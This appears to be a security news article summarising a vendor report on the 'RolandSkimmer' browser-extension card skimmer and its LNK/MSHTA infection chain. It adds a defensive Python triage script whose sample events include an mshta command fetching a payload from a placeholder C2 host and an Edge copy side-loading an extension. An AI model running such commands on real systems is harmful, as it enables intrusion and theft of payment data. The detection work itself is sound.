Web-based credit card skimming remains a persistent and evolving threat, and FortiGuard Labs has recently uncovered a sophisticated campaign dubbed "RolandSkimmer" that highlights this danger. Named after the unique string "Rol@and4You" embedded in its payload, this campaign targets users in Bulgaria with a new wave of attacks leveraging malicious browser extensions across Chrome, Edge, and Firefox.
The attack begins with a malicious ZIP file, such as "faktura_3716804.zip". Once extracted, this ZIP file presents users with a seemingly harmless shortcut file, typically named "faktura_1065170.lnk". However, this shortcut hides a malicious command that covertly executes obfuscated scripts, establishing persistent and covert access to the user's system.
The malicious LNK file initiates a chain of events, ultimately leading to the deployment of a malicious browser extension.
Initial Execution: The LNK file executes a hidden command that uses MSHTA.exe to run a VBScript.
Payload Delivery: This VBScript retrieves an obfuscated VBScript payload from a remote server.
Command and Control: The retrieved script establishes a continuous connection loop, polling the attacker's server for commands.
Malicious Script Execution: Once commands are received, the script decodes hexadecimal data and executes the corresponding malicious actions.
A critical component of the RolandSkimmer campaign is the use of malicious browser extensions. These extensions are designed to harvest and exfiltrate sensitive financial data, often without the user's knowledge.
Deceptive Disguise: The Edge extension, for example, is disguised as "Disable Content Security Policy", misleading users with a seemingly benign name.
Extensive Permissions: These extensions request broad permissions, granting them significant control over the user's browser activity and data.
The malicious extensions employed in the RolandSkimmer campaign possess a range of capabilities that enable them to effectively steal sensitive information:
User Tracking: The extensions generate unique identifiers to track users across browsing sessions.
Payload Retrieval: They retrieve encrypted payloads from local storage or remote servers.
Code Injection: They inject malicious JavaScript code into web pages.
Data Monitoring: They monitor user interactions, focusing on form submissions and credit card data.
Data Exfiltration: They exfiltrate captured data to a command-and-control (C2) server.
To maintain a persistent presence on infected systems, the attackers employ sophisticated techniques, particularly with the Edge browser. This involves copying the legitimate Edge executable, loading the malicious extension, and replacing legitimate Edge shortcuts with malicious ones.
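The execution chain (LNK launching MSHTA.exe with a remote VBScript) and the Edge persistence trick (a copied Edge binary loading an unverified extension) both leave traces in process-creation telemetry. The following triage script is an added example, not FortiGuard's code: it runs four detection rules over constructed process events. The Edge install directories and the assumption that the copied Edge binary side-loads its extension with Chromium's --load-extension switch are assumptions, not details from the report.

```python
"""Triage of process-creation events for the RolandSkimmer chain.
Sample events are constructed for illustration, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str    # full path of the created process
    parent: str   # image name of the parent process
    cmdline: str  # full command line


# Assumption: Edge normally runs from one of these directories; a copy elsewhere is suspect.
EDGE_INSTALL_DIRS = {r"c:\program files (x86)\microsoft\edge\application",
                     r"c:\program files\microsoft\edge\application"}


def triage(ev: ProcEvent) -> list[str]:
    """Return the names of the rules that fire on one event (empty if clean)."""
    hits = []
    img, cmd = ev.image.lower(), ev.cmdline.lower()
    directory, _, name = img.rpartition("\\")
    # Rule 1: mshta.exe running inline VBScript or fetching a script over HTTP(S),
    # matching the initial-execution and payload-delivery stages above.
    if name == "mshta.exe" and re.search(r"vbscript:|https?://", cmd):
        hits.append("mshta_remote_or_inline_script")
    # Rule 2: mshta.exe spawned by explorer.exe is consistent with a double-clicked LNK.
    if name == "mshta.exe" and ev.parent.lower() == "explorer.exe":
        hits.append("mshta_from_explorer")
    # Rule 3: msedge.exe running outside its install directory, i.e. a copied binary.
    if name == "msedge.exe" and directory not in EDGE_INSTALL_DIRS:
        hits.append("edge_binary_outside_install_dir")
    # Rule 4 (assumption): a Chromium browser launched with an unpacked extension.
    if name in ("msedge.exe", "chrome.exe") and "--load-extension=" in cmd:
        hits.append("browser_sideloads_extension")
    return hits


def triage_all(events: list[ProcEvent]) -> dict[str, list[str]]:
    """Map each event's image path to the rules it triggered, skipping clean events."""
    return {ev.image: h for ev in events if (h := triage(ev))}


SAMPLE_EVENTS = [  # constructed; the URL uses the reserved .invalid TLD
    ProcEvent(r"C:\Windows\System32\mshta.exe", "explorer.exe",
              "mshta.exe https://c2.example.invalid/stage1"),
    ProcEvent(r"C:\Users\Public\Edge\msedge.exe", "explorer.exe",
              r'"C:\Users\Public\Edge\msedge.exe" --load-extension="C:\Users\Public\ext"'),
    ProcEvent(r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
              "explorer.exe", '"msedge.exe" --profile-directory=Default'),
    ProcEvent(r"C:\Windows\System32\mshta.exe", "msiexec.exe",
              r"mshta.exe C:\Windows\Temp\setup.hta"),
]

if __name__ == "__main__":
    for image, rules in triage_all(SAMPLE_EVENTS).items():
        print(image, "->", ", ".join(rules))
```

The last two sample events (Edge from its install directory, and a local .hta launched by an installer) trigger nothing, which is the specificity a SOC rule needs before alerting on MSHTA or Edge activity at all.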
The RolandSkimmer campaign demonstrates the effectiveness of using malicious browser extensions for long-term access and data theft. As FortiGuard Labs emphasizes, "RolandSkimmer underscores the growing sophistication of LNK-based threats," highlighting how attackers exploit legitimate system tools and scripting capabilities. To defend against such threats, users are advised to "avoid opening unknown LNK files", and organizations should "restrict or monitor the use of unverified browser extensions" and "implement security tools capable of detecting unusual script activity".